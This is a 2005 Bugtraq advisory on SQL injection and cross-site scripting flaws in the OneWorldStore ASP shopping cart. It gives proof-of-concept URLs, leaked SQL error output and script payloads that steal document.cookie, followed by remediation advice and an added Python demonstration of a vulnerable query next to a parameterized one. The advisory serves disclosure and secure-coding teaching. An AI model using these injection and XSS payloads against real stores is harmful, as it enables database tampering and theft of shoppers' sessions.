List: bugtraq
Subject: Multiple multiple sql injection/errors and xss vulnerabilities in
From: dcrab <dcrab () hackerscenter ! com>
Date: 2005-04-14 18:31:17
Message-ID: 20050414183117.2562.qmail () www ! securityfocus ! com
Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah
Severity: High
Title: Multiple SQL injection/error and XSS vulnerabilities in OneWorldStore
Date: 14/04/2005
Vendor: OneWorldStore
Vendor Website: http://www.oneworldstore.com
Summary: OneWorldStore contains multiple SQL injection flaws (with verbose database error pages that disclose the full SQL statement) and several reflected and stored cross-site scripting vulnerabilities.
Proof of Concept Exploits:
http://example.com/owBasket/owAddItem.asp?idProduct='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.
SELECT stock FROM Products WHERE idProduct = 'SQL_INJECTION
ADODB.Recordset error '800a0e78'
Operation is not allowed when the object is closed.
/owBasket/owAddItem.asp, line 48
http://example.com/owListProduct.asp?bSpecials='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.
SELECT * FROM Categories WHERE idCategory = AND Active = -1
ADODB.Recordset error '800a0e78'
Operation is not allowed when the object is closed.
/owListProduct.asp, line 50
Note: the leaked statement contains no idCategory value at all (idCategory = AND Active = -1), so this request shows a verbose error from the missing parameter rather than injection through bSpecials; the full SQL statement is still disclosed to the client.
http://example.com/owListProduct.asp?idCategory='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.
SELECT * FROM Categories WHERE idCategory = ''SQL AND Active = -1
ADODB.Recordset error '800a0e78'
Operation is not allowed when the object is closed.
/owListProduct.asp, line 50
Note: the leaked statement shows that a single quote in the input is doubled to '' but the value is then inserted without surrounding quotes into a numeric comparison, so quote escaping gives no protection here; a payload containing no quote at all (a number followed by OR ...) is passed to the database unchanged. The owProductDetail.asp queries below show the same pattern.
http://example.com/owProductDetail.asp?idproduct='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.
SELECT * FROM products WHERE idProduct = ''SQL_INJEC AND active = -1
ADODB.Recordset error '800a0e78'
Operation is not allowed when the object is closed.
/owProductDetail.asp, line 647
http://example.com/owProductDetail.asp?sAction=ProductReview&idProduct='SQL_INJECTION&idCategory=40&sUserName=&sUserEmail=&sRating=1&sBody=dcrab
SQL INJECTION
ODBC driver does not support the requested properties.
SELECT * FROM products WHERE idProduct = ''SQL_INJEC AND active = -1
ADODB.Recordset error '800a0e78'
Operation is not allowed when the object is closed.
/owProductDetail.asp, line 647
http://example.com/owContactUs.asp?sAction=Contact&sName=&sEmail='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&sType=None+Specified&sDescription=dcrab
Pops Cookie
http://example.com/owListProduct.asp?bSub='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&idCategory=64
Pops Cookie
http://example.com/owProductDetail.asp
Submitting the review form with something like
Name: '%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Email: '%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E@'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E.com
Rating: 5
Comment: '%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
stores the script with the review, producing persistent (stored) XSS that runs in the browser of anyone who later views the product page and lets the attacker steal their cookies.
Possible Fixes: The error pages above (ADODB.Recordset, ODBC driver) show that OneWorldStore is a classic ASP application, so PHP helpers such as htmlspecialchars(), mysql_escape_string() and mysql_real_escape_string() do not apply to it. The leaked queries also show that doubling single quotes is already being done and does not help when the value is pasted unquoted into a numeric comparison. The fix is to stop building SQL from strings: pass idProduct, idCategory and the other parameters through an ADODB.Command with bound parameters (and reject non-integer values for numeric IDs before use), HTML-encode every user-supplied value with Server.HTMLEncode() before writing it into a page, and disable detailed ASP error messages so that failed statements are no longer echoed to the client.
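As an added example (not code from the advisory or from OneWorldStore), the following Python script reproduces the flaw the leaked queries reveal and the fix described above, using an in-memory SQLite table as a stand-in for the ODBC backend. Table and column names follow the error output above; the product rows, the function names and the review-form markup are constructed for illustration.

```python
import html
import sqlite3

# Constructed sample data: the third product is inactive and must never be
# shown to a shopper.
PRODUCTS = [
    (1, "Widget", -1),
    (2, "Gadget", -1),
    (3, "Unreleased", 0),
]

# Payloads: the quoted one from the advisory, and an unquoted one that the
# quote-doubling seen in the leaked queries cannot stop.
QUOTED_PAYLOAD = "'SQL_INJECTION"
NUMERIC_PAYLOAD = "0 OR 1=1 --"
XSS_PAYLOAD = "'\"><script>alert(document.cookie)</script>"


def make_db() -> sqlite3.Connection:
    """Stand-in for the store's ODBC database (SQLite, in memory)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (idProduct INTEGER, name TEXT, active INTEGER)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    return db


def vulnerable_product_lookup(db, id_product: str):
    """Builds the statement the way the leaked query shows it was built:
    single quotes are doubled, but the value is then pasted unquoted into a
    numeric comparison. Returns the rows, or None when the database rejects
    the statement (the equivalent of the ADODB error page in the advisory)."""
    doubled = id_product.replace("'", "''")
    sql = ("SELECT idProduct, name, active FROM products "
           f"WHERE idProduct = {doubled} AND active = -1")
    try:
        return db.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return None


def fixed_product_lookup(db, id_product: str):
    """Validates the ID as an integer and binds it as a parameter, so the
    value can never be parsed as SQL. The classic ASP equivalent is an
    ADODB.Command with an adInteger parameter."""
    try:
        id_int = int(id_product)
    except ValueError:
        return []
    sql = ("SELECT idProduct, name, active FROM products "
           "WHERE idProduct = ? AND active = -1")
    return db.execute(sql, (id_int,)).fetchall()


def render_review(name: str, body: str, encode: bool) -> str:
    """Echoes a submitted review back into a page, as the review form does.
    With encode=False the advisory's payload closes the value="" attribute
    and injects a script tag; with encode=True every untrusted value is
    HTML-encoded (Server.HTMLEncode in ASP, html.escape here)."""
    enc = (lambda s: html.escape(s, quote=True)) if encode else (lambda s: s)
    return (f'<input name="sUserName" value="{enc(name)}">'
            f'<p>{enc(body)}</p>')


if __name__ == "__main__":
    db = make_db()
    print("quoted payload, vulnerable:", vulnerable_product_lookup(db, QUOTED_PAYLOAD))
    print("numeric payload, vulnerable:", vulnerable_product_lookup(db, NUMERIC_PAYLOAD))
    print("numeric payload, fixed:", fixed_product_lookup(db, NUMERIC_PAYLOAD))
    print("unencoded review:", render_review(XSS_PAYLOAD, XSS_PAYLOAD, encode=False))
    print("encoded review:", render_review(XSS_PAYLOAD, XSS_PAYLOAD, encode=True))
```

Run directly, the vulnerable lookup returns the inactive product for the unquoted payload while the bound version returns nothing, and the quoted payload from the advisory produces a database error, which is exactly the page the PoC requests above show. The review rendering shows why quote-doubling for SQL does nothing for HTML: only output encoding keeps the script tag from being parsed.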
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah
Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://digitalparadox.org/. Look out for my soon to come out book on Secure coding with php.